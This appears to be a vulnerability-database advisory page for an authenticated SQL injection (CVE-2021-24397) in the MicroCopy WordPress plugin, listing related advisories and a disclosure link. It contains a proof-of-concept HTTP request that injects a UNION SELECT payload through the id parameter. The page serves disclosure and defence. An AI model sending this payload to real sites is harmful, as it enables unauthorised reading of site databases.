MicroCopy <= 1.1.0 - Authenticated SQL Injection in GET Reques
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Prion | Sql injection | 20 Sep 202110:15 | – | prion |
NVD | CVE-2021-24397 | 20 Sep 202110:15 | – | nvd |
Patchstack | WordPress MicroCopy plugin <= 1.1.0 - Authenticated SQL Injection (SQLi) vulnerability | 22 Aug 202100:00 | – | patchstack |
CVE | CVE-2021-24397 | 20 Sep 202110:15 | – | cve |
WPVulnDB | MicroCopy <= 1.1.0 - Authenticated SQL Injection | 22 Aug 202100:00 | – | wpvulndb |
Cvelist | CVE-2021-24397 MicroCopy <= 1.1.0 - Authenticated SQL Injection | 20 Sep 202110:06 | – | cvelist |
Source | Link |
---|---|
codevigilant | www.codevigilant.com/disclosure/2021/wp-plugin-microcopy/ |
GET /wp-admin/admin.php?page=microcopy%2Fdetail.php&action=edit&id=-5617%20UNION%20ALL%20SELECT%201,2,user(),3 HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo